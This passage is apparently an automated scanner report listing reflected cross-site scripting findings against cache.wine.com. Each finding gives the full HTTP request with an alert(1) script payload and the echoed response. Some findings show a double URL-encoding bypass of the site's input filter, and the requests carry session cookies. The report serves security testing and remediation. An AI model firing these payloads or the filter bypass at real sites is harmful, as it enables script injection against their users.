Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingCG.gif?Lo0P=70095<script>alert(1)</script>d0259add5c3 was not found on this server.<P>
...[SNIP]...

1.27. http://cache.wine.com/images/ratingJH.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingJH.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 32782<script>alert(1)</script>01af30a1f08 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingJH.gif?Lo0P=32782<script>alert(1)</script>01af30a1f08 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingJH.gif?Lo0P=32782<script>alert(1)</script>01af30a1f08 was not found on this server.<P>
...[SNIP]...

1.28. http://cache.wine.com/images/ratingRP.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingRP.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 1b75a<script>alert(1)</script>4e3044403c8 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingRP.gif?Lo0P=1b75a<script>alert(1)</script>4e3044403c8 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:26 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingRP.gif?Lo0P=1b75a<script>alert(1)</script>4e3044403c8 was not found on this server.<P>
...[SNIP]...

1.29. http://cache.wine.com/images/ratingWE.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingWE.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload b2275<script>alert(1)</script>50e0f694b76 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingWE.gif?Lo0P=b2275<script>alert(1)</script>50e0f694b76 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:11 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingWE.gif?Lo0P=b2275<script>alert(1)</script>50e0f694b76 was not found on this server.<P>
...[SNIP]...

1.30. http://cache.wine.com/images/ratingWN.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingWN.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 2a637<script>alert(1)</script>9278ca47b3d was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingWN.gif?Lo0P=2a637<script>alert(1)</script>9278ca47b3d HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingWN.gif?Lo0P=2a637<script>alert(1)</script>9278ca47b3d was not found on this server.<P>
...[SNIP]...

1.31. http://cache.wine.com/images/ratingWP.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingWP.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 34808<script>alert(1)</script>f6e43fbaae4 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingWP.gif?Lo0P=34808<script>alert(1)</script>f6e43fbaae4 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:48 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingWP.gif?Lo0P=34808<script>alert(1)</script>f6e43fbaae4 was not found on this server.<P>
...[SNIP]...

1.32. http://cache.wine.com/images/tn_img_bg_fade.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/tn_img_bg_fade.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 78970<script>alert(1)</script>df493198473 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/tn_img_bg_fade.gif?Lo0P=78970<script>alert(1)</script>df493198473 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 261
Date: Mon, 14 Feb 2011 17:16:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/tn_img_bg_fade.gif?Lo0P=78970<script>alert(1)</script>df493198473 was not found on this server.<P>
...[SNIP]...

1.33. http://cache.wine.com/images/topnav/imgGlobalHeaderRightBadge.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/topnav/imgGlobalHeaderRightBadge.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload f8c4c<script>alert(1)</script>3c927d37eef was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/topnav/imgGlobalHeaderRightBadge.gif?Lo0P=f8c4c<script>alert(1)</script>3c927d37eef HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 279
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/topnav/imgGlobalHeaderRightBadge.gif?Lo0P=f8c4c<script>alert(1)</script>3c927d37eef was not found on this server.<P>
...[SNIP]...

1.34. http://cache.wine.com/images/topnav/imgGlobalHeaderWineGuyLogo.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/topnav/imgGlobalHeaderWineGuyLogo.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 8d1d5<script>alert(1)</script>96824b428f0 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/topnav/imgGlobalHeaderWineGuyLogo.gif?Lo0P=8d1d5<script>alert(1)</script>96824b428f0 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 280
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/topnav/imgGlobalHeaderWineGuyLogo.gif?Lo0P=8d1d5<script>alert(1)</script>96824b428f0 was not found on this server.<P>
...[SNIP]...

1.35. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /includes/css/defaultsixC.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12a1d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7682b0218f7 was submitted in the REST URL parameter 1. This input was echoed as 12a1d"><script>alert(1)</script>7682b0218f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes12a1d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7682b0218f7/css/defaultsixC.css?v=634305316255490024 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache.wine.com/?s=error_404
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; ASPSESSIONIDCAADTCTT=FOPHBBLAKOBMIJIECKNIKPBL; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=141878944.2078173882.1297703931.1297703931.1297703931.1; __utmb=141878944; __utmc=141878944; __utmz=141878944.1297703931.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/59|utmcmd=referral; SessionGUID=1e3937c8-a88b-4060-a1bc-35f684a9037c; ASP.NET_SessionId=v3dtb3mmqbubajeqx4v01odl; warehouse=CA; cSource=error_404; SL_UVId=2B1D3888066794EE

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:18:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 33460


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/includes12a1d"><script>alert(1)</script>7682b0218f7/css/defaultsixC.css?v" value="634305316255490024" />
...[SNIP]...

1.36. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /includes/css/defaultsixC.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d405%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b56cecc278 was submitted in the REST URL parameter 2. This input was echoed as 2d405"><script>alert(1)</script>2b56cecc278 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/css2d405%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b56cecc278/defaultsixC.css?v=634305316255490024 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache.wine.com/?s=error_404
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; ASPSESSIONIDCAADTCTT=FOPHBBLAKOBMIJIECKNIKPBL; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=141878944.2078173882.1297703931.1297703931.1297703931.1; __utmb=141878944; __utmc=141878944; __utmz=141878944.1297703931.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/59|utmcmd=referral; SessionGUID=1e3937c8-a88b-4060-a1bc-35f684a9037c; ASP.NET_SessionId=v3dtb3mmqbubajeqx4v01odl; warehouse=CA; cSource=error_404; SL_UVId=2B1D3888066794EE

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:18:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 33460


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/includes/css2d405"><script>alert(1)</script>2b56cecc278/defaultsixC.css?v" value="634305316255490024" />
...[SNIP]...

1.37. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /includes/css/defaultsixC.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85be706f6e0 was submitted in the REST URL parameter 3. This input was echoed as d3385"><script>alert(1)</script>85be706f6e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/css/defaultsixC.cssd3385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85be706f6e0?v=634305316255490024 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache.wine.com/?s=error_404
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; ASPSESSIONIDCAADTCTT=FOPHBBLAKOBMIJIECKNIKPBL; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=141878944.2078173882.1297703931.1297703931.1297703931.1; __utmb=141878944; __utmc=141878944; __utmz=141878944.1297703931.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/59|utmcmd=referral; SessionGUID=1e3937c8-a88b-4060-a1bc-35f684a9037c; ASP.NET_SessionId=v3dtb3mmqbubajeqx4v01odl; warehouse=CA; cSource=error_404; SL_UVId=2B1D3888066794EE

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:18:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cSource=error%5F404; expires=Mon, 14-Feb-2011 19:18:02 GMT; path=/
Set-Cookie: SessionGUID=1e3937c8%2Da88b%2D4060%2Da1bc%2D35f684a9037c; expires=Tue, 14-Feb-2012 17:18:02 GMT; domain=cache.wine.com; path=/
Content-Length: 33460


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/includes/css/defaultsixC.cssd3385"><script>alert(1)</script>85be706f6e0?v" value="634305316255490024" />
...[SNIP]...

1.38. http://cache.wine.com/labels/102688m.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/102688m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 21799<script>alert(1)</script>c7ad993dd1f was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/102688m.jpg?Lo0P=21799<script>alert(1)</script>c7ad993dd1f HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/102688m.jpg?Lo0P=21799<script>alert(1)</script>c7ad993dd1f was not found on this server.<P>
...[SNIP]...

1.39. http://cache.wine.com/labels/103040m.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/103040m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload dfa40<script>alert(1)</script>25200f1dd87 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/103040m.jpg?Lo0P=dfa40<script>alert(1)</script>25200f1dd87 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/103040m.jpg?Lo0P=dfa40<script>alert(1)</script>25200f1dd87 was not found on this server.<P>
...[SNIP]...

1.40. http://cache.wine.com/labels/106551m.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/106551m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload d543d<script>alert(1)</script>111e9e0bcf8 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/106551m.jpg?Lo0P=d543d<script>alert(1)</script>111e9e0bcf8 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
